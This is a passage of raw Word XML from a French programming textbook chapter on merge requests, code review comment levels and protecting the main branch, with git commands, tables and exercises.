            <w:tcW w:type="dxa" w:w="314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Quoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Liste du diff recopiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2289"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Preuves</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cases cochées sans test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Traçabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Aucun ticket lié</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2289"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Captures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Preuve visuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Absentes pour un changement d'interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications avant de pousser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Préparer une demande de fusion propre</w:t>
        <w:br/>
        <w:t>git fetch origin</w:t>
        <w:br/>
        <w:t>git rebase origin/main          # ou git merge origin/main</w:t>
        <w:br/>
        <w:t>npm run lint &amp;&amp; npm test</w:t>
        <w:br/>
        <w:t>git push --force-with-lease origin feature/menu</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`FORCE-WITH-LEASE`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Variante de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--force</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> qui refuse l'envoi si la branche distante a changé depuis votre dernier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fetch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>. Elle évite d'écraser le travail d'autrui.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>51.4 Conduire une revue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La revue est un dialogue technique, pas un contrôle hiérarchique. Son but est de réduire le risque et de partager la connaissance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre niveaux de commentaire · markdown</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**Bloquant** — `innerHTML` reçoit une donnée d'API. Risque d'injection.</w:t>
        <w:br/>
        <w:t>Utiliser `textContent` ou construire les nœuds.</w:t>
        <w:br/>
        <w:br/>
        <w:t>**Question** — Que se passe-t-il si l'utilisateur clique deux fois rapidement</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ?</w:t>
        <w:br/>
        <w:t>Le bouton est-il désactivé pendant l'envoi ?</w:t>
        <w:br/>
        <w:br/>
        <w:t>**Suggestion** — `donnees` pourrait s'appeler `commandes` : le nom actuel</w:t>
        <w:br/>
        <w:t>ne dit pas de quoi il s'agit.</w:t>
        <w:br/>
        <w:br/>
        <w:t>**Nit** — Ligne 42 : espace avant la parenthèse (non bloquant).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.177 — Quatre niveaux de retour</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32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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="423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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bloquant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4234"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À corriger avant fusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blocage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="423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Demande de clarification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Discussion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suggestion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4234"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Amélioration possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Libre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Nit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="423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Détail de forme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Ignorable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REVUE EN MOINS DE 400 LIGNES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Au-delà de 400 lignes modifiées, la capacité de détection d'un relecteur s'effondre. Découpez la demande en plusieurs si nécessaire, ou limitez la revue aux fichiers critiques et automatisez le reste.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.178 — Ce que chacun traite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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="420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Automatisable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480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Humain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4207"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Formatage, indentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4808"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conception et découpage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4207"/>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Erreurs de type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480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Nommage et lisibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4207"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tests qui échouent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4808"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pertinence des tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4207"/>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Fautes de frappe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480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Sécurité et cas limites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4207"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendances vulnérables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4808"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cohérence avec l'architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>51.5 Protéger la branche principale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les protections transforment les règles d'équipe en contraintes techniques. Elles évitent les erreurs de bonne foi, pas seulement les abus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Sept règles de protection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Règles typiques sur main</w:t>
        <w:br/>
        <w:t>- Interdire le push direct</w:t>
        <w:br/>
        <w:t>- Exiger une demande de fusion</w:t>
        <w:br/>
        <w:t>- Exiger une approbation</w:t>
        <w:br/>
        <w:t>- Exiger que la CI passe</w:t>
        <w:br/>
        <w:t>- Exiger une branche à jour</w:t>
        <w:br/>
        <w:t>- Interdire la fusion si un fil de discussion est non résolu</w:t>
        <w:br/>
        <w:t>- Interdire le force-push et la suppression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Faire respecter les conventions par l'outil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Vérification locale des conventions</w:t>
        <w:br/>
        <w:t>npx commitlint --from origin/main</w:t>
        <w:br/>
        <w:t># Exemple de règle : type(scope): description</w:t>
        <w:br/>
        <w:t># feat(menu): ajoute la navigation clavier</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RÈGLES DE CONTRIBUTION MINIMALES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Comment installer et lancer les tests.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Format des messages de commit.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Une branche par intention, nommée explicitement.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Ce qu'une demande de fusion doit contenir.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Qui relit et sous quel délai.</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forge ajoute revues, tickets et automatisation au dépôt Git.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GitHub Flow convient à la livraison continue.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branche doit vivre quelques jours, pas quelques semaines.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demande de fusion expose objectif, changements et vérifications.</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--force-with-lease</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite d'écraser les commits d'autrui.</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niveaux de commentaire clarifient ce qui bloque.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Ce qui est automatisable ne doit pas être relu à la main.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protections de branche traduisent les règles en contraintes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le code se partage et se révise. Il faut encore une machine pour l'exécuter : le chapitre suivant prépare des serveurs reproductibles.</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51.1 — Rédiger une demande de fusion</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Votre branche ajoute un filtre de recherche accessible.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Décrivez l'objectif en une phrase.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Listez les changements vérifiables.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Cochez les preuves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 51.2 — Configurer des protections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ORGANISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une équipe de cinq personnes travaille sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</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Interdisez le push direct.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Exigez CI et revue.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Définissez la conduite en cas d'urgence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 51.3 — Relire une demande de fusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   REVUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
